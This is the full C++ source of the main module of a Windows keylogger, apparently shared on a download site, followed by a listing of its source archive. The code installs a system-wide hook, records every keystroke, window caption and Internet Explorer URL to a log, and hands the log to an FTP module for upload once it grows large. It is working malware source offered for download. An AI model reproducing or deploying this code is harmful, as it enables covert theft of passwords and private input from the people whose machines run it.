// Written by Dor Alon 2005
#include "stdafx.h"
#include <stdio.h>
#include "resource.h"
#include "consts.h"
typedef LRESULT (CALLBACK *HookProc)( int nCode, WPARAM wParam, LPARAM lParam);
typedef void (WINAPI *SetSpyHwnd)(DWORD);
typedef DWORD (WINAPI *GetCommHwnd)();
HMODULE g_hHookDll = NULL;
HHOOK g_hHook = NULL;
HWND g_hWinInFocus = NULL;
HWND g_hLastWin = NULL;
bool g_isUploading = false;
char g_sSpyLogFileName[1024];
char g_sSpyLogFileName2[1024];
/////////////////////////////////////////////////////////////////////////////////////////////
bool InstallHook(HWND hwnd)
{
SetSpyHwnd SetHwndFunc;
HookProc HookProcFunc;
if (g_hHookDll = LoadLibrary(SPY_DLL_NAME))
{
if (SetHwndFunc = (SetSpyHwnd) ::GetProcAddress (g_hHookDll,"SetSpyHwnd"))
{
//Store Main Module HWND in to the shared memory
(SetHwndFunc)((DWORD)hwnd);
if (HookProcFunc = (HookProc) ::GetProcAddress (g_hHookDll,"HookProc"))
{
if (g_hHook = SetWindowsHookEx(WH_CBT, HookProcFunc, g_hHookDll, 0))
return true;
}
}
}
return false;
}
/////////////////////////////////////////////////////////////////////////////////////////////
VOID CALLBACK TimerProc(HWND hwnd, UINT uMsg, unsigned int idEvent, DWORD dwTime)
{
DWORD fileSizeHigh, fileSizeLow;
HWND hCommWin;
if (g_isUploading) return;
fileSizeLow = GetCompressedFileSize(g_sSpyLogFileName, &fileSizeHigh);
if (fileSizeLow > MAX_SIZE_OF_LOG)
{
if (hCommWin = ::FindWindow(COMM_WIN_CLASS, ""))
{
::MoveFile(g_sSpyLogFileName, g_sSpyLogFileName2);
::PostMessage(hCommWin, MSG_WM_UPLOAD_FILE, 0, 0);
g_isUploading = true;
}
}
}
///////////////////////////////////////////////////////////////////////////////////////////
void WriteToLog(char ch)
{
char str[2];
str[0] = ch;
str[1] = NULL;
FILE* fout = fopen(g_sSpyLogFileName, "a+");
if (fout)
{
fwrite(str, 1, 1, fout);
fclose(fout);
}
}
///////////////////////////////////////////////////////////////////////////////////////////
void WriteToLog(char *text)
{
FILE* fout = fopen(g_sSpyLogFileName, "a+");
if (fout)
{
fwrite(text, 1, strlen(text), fout);
fclose(fout);
}
}
///////////////////////////////////////////////////////////////////////////////////////////
BOOL CALLBACK EnumIEControls(HWND hwnd, LPARAM lParam)
{
char szClassName[255];
::GetClassName(hwnd, szClassName, 255);
if (strcmp(szClassName, "Edit") == 0)
{
::SendMessage(hwnd, WM_GETTEXT, 255, lParam);
return FALSE;
}
return TRUE;
}
///////////////////////////////////////////////////////////////////////////////////////////
void WriteNewAppHeader(HWND hwnd)
{
HWND hTopLevelWin;
HWND hTemp = hwnd;
//Retrieve top level window handle
while(hTemp = ::GetParent(hTemp))
{
hTopLevelWin = hTemp;
}
//Retrieve top level window caption
char szWinTitle[255];
::SendMessage(hTopLevelWin, WM_GETTEXT, 255, (LPARAM)szWinTitle);
//Write to log
char szHeader[255];
sprintf(szHeader, "\nWin Caption = %s\n", szWinTitle);
WriteToLog(szHeader);
//If this window is IE retrieve URL as well
if (strstr(szWinTitle, "Internet Explorer"))
{
char url[255];
url[0] = NULL;
::EnumChildWindows(hTopLevelWin, EnumIEControls, (LPARAM)url);
if (strlen(url))
{
sprintf(szHeader, "url = %s\n", url);
WriteToLog(szHeader);
}
}
}
/////////////////////////////////////////////////////////////////////////////
LRESULT OnInterceptKeyStroke(WPARAM wParam, LPARAM lParam)
{
//If we are logging a new application we should print an appropriate header
if (g_hWinInFocus != g_hLastWin)
{
WriteNewAppHeader(g_hWinInFocus);
g_hLastWin = g_hWinInFocus;
}
if (wParam==VK_RETURN || wParam==VK_TAB)
{
WriteToLog('\n');
}
else
{
BYTE keyStateArr[256];
WORD word;
UINT scanCode = lParam;
char ch;
//Translate virtual key code to ascii
GetKeyboardState(keyStateArr);
ToAscii(wParam, scanCode, keyStateArr, &word, 0);
ch = (char) word;
if ((GetKeyState(VK_SHIFT) & 0x8000) && wParam >= 'a' && wParam <= 'z')
ch += 'A'-'a';
WriteToLog(ch);
}
return 0;
}
/////////////////////////////////////////////////////////////////////////////
LRESULT OnSetKeyboardFocus(WPARAM wParam, LPARAM lParam)
{
g_hWinInFocus = (HWND)wParam;
return S_OK;
}
/////////////////////////////////////////////////////////////////////////////
LRESULT OnFileUploaded(WPARAM wParam, LPARAM lParam)
{
//Log file was uploaded succesfully
if (wParam)
{
DeleteFile(g_sSpyLogFileName2);
}
else
{
char temp[255];
FILE* f1=fopen(g_sSpyLogFileName,"rt");
FILE* f2=fopen(g_sSpyLogFileName2,"at");
while (!feof(f1))
{
if (fgets(temp, 255, f1))
{
fputs(temp, f2);
}
}
fclose(f1);
fclose(f2);
MoveFile(g_sSpyLogFileName2, g_sSpyLogFileName);
}
g_isUploading = false;
return S_OK;
}
/////////////////////////////////////////////////////////////////////////////////////////////
//
// FUNCTION: WndProc(HWND, unsigned, WORD, LONG)
//
// PURPOSE: Processes messages for the main window.
//
// MSG_MY_WM_KEYDOWN - Process an application keystroke
// MSG_MY_WM_SETFOCUS - Process an application keystroke
// MSG_WM_UPLOAD_FILE - Process an FTP Module notification
// WM_DESTROY - post a quit message and return
//
//
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
if (message == MSG_MY_WM_KEYDOWN)
return OnInterceptKeyStroke(wParam, lParam);
if (message == MSG_MY_WM_SETFOCUS)
return OnSetKeyboardFocus(wParam, lParam);
if (message == MSG_WM_UPLOAD_FILE)
return OnFileUploaded(wParam, lParam);
switch (message)
{
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
}
return 0;
}
/////////////////////////////////////////////////////////////////////////////////////////////
ATOM MyRegisterClass(HINSTANCE hInstance)
{
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = 0;
wcex.lpfnWndProc = (WNDPROC)WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = NULL;
wcex.hCursor = NULL;
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = SPY_WIN_CLASS;
wcex.hIconSm = NULL;
return RegisterClassEx(&wcex);
}
/////////////////////////////////////////////////////////////////////////////////////////////
void InitGlobals()
{
g_hWinInFocus = NULL;
g_hLastWin = NULL;
g_isUploading = false;
//Retrive full path of spy.exe
::GetModuleFileName(GetModuleHandle(NULL), g_sSpyLogFileName, 1024);
//Trim "spy.exe"
while (g_sSpyLogFileName && g_sSpyLogFileName[strlen(g_sSpyLogFileName)-1] != '\\')
g_sSpyLogFileName[strlen(g_sSpyLogFileName)-1] = NULL;
strcpy(g_sSpyLogFileName2, g_sSpyLogFileName);
//spy.exe path + log file name = full path of log file
strcat(g_sSpyLogFileName, LOG_FILE);
strcat(g_sSpyLogFileName2, LOG_FILE2);
}
/////////////////////////////////////////////////////////////////////////////////////////////
int APIENTRY WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
MSG msg;
HWND hWnd;
InitGlobals();
if (!MyRegisterClass(hInstance))
return FALSE;
if (!(hWnd = CreateWindow(SPY_WIN_CLASS, "", WS_OVERLAPPEDWINDOW, 0, 0, 0, 0, NULL, NULL, hInstance, NULL)))
return FALSE;
if (!InstallHook(hWnd))
return FALSE;
::SetTimer(hWnd, 0, CHECK_LOG_SIZE_TIME, TimerProc);
// Main message loop:
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return msg.wParam;
}
KeyLogger_src.zip (65个子文件) 
.NET spy_safe 
SpySafe.csproj 5KB Form1.cs 4KB SpySafe.sln 899B SafeEdit.resx 2KB App.ico 1KB Form1.resx 10KB SafeEdit.cs 3KB AssemblyInfo.cs 2KB hook_safe SpyRemover.cpp 2KB StdAfx.cpp 211B hook_safe.rc 4KB resource.h 549B hook_safeDlg.cpp 3KB hook_safeDlg.h 1KB hook_safe.sln 907B SpyRemover.h 478B StdAfx.h 999B hook_safe.cpp 2KB res hook_safe.rc2 401B hook_safe.ico 1KB hook_safe.vcproj 6KB hook_safe.h 1KB spy StdAfx.cpp 290B spy.sln 2KB ftpdll ftpdll.cpp 4KB StdAfx.cpp 293B ftpdll.vcproj 6KB StdAfx.h 802B ftpdll.def 19B StdAfx.h 936B spy.vcproj 5KB consts.h 951B spy.cpp 8KB spydll spydll.vcproj 5KB StdAfx.cpp 293B spydll.cpp 2KB spydll.def 39B StdAfx.h 802B spy_safe StdAfx.cpp 210B spy_safe.h 1KB resource.h 686B spy_safe.sln 905B SafeEdit.h 841B StdAfx.h 999B spy_safe.cpp 2KB spy_safe.vcproj 7KB res spy_safe.rc2 400B spy_safe.ico 1KB SafeEdit.cpp 2KB spy_safeDlg.h 1KB spy_safe.rc 4KB spy_safeDlg.cpp 3KB setup_ftp setup_ftpDlg.h 774B setup_ftp.sln 907B resource.h 773B stdafx.h 2KB setup_ftp.h 520B setup_ftpDlg.cpp 3KB stdafx.cpp 209B setup_ftp.vcproj 5KB setup_ftp.cpp 2KB setup_ftp.rc 5KB res setup_ftp.ico 21KB setup_ftp.rc2 400B setup KeyLogger.iss 3KB
zls_zl
- 粉丝: 2
- 资源: 11
最新资源
- 10、安徽省大学生学科和技能竞赛A、B类项目列表(2019年版).xlsx
- 9、教育主管部门公布学科竞赛(2015版)-方喻飞
- C语言-leetcode题解之83-remove-duplicates-from-sorted-list.c
- C语言-leetcode题解之79-word-search.c
- C语言-leetcode题解之78-subsets.c
- C语言-leetcode题解之75-sort-colors.c
- C语言-leetcode题解之74-search-a-2d-matrix.c
- C语言-leetcode题解之73-set-matrix-zeroes.c
- 树莓派物联网智能家居基础教程
- YOLOv5深度学习目标检测基础教程
资源上传下载、课程学习等过程中有任何疑问或建议,欢迎提出宝贵意见哦~我们会及时处理!
点击此处反馈
- 1
- 2
前往页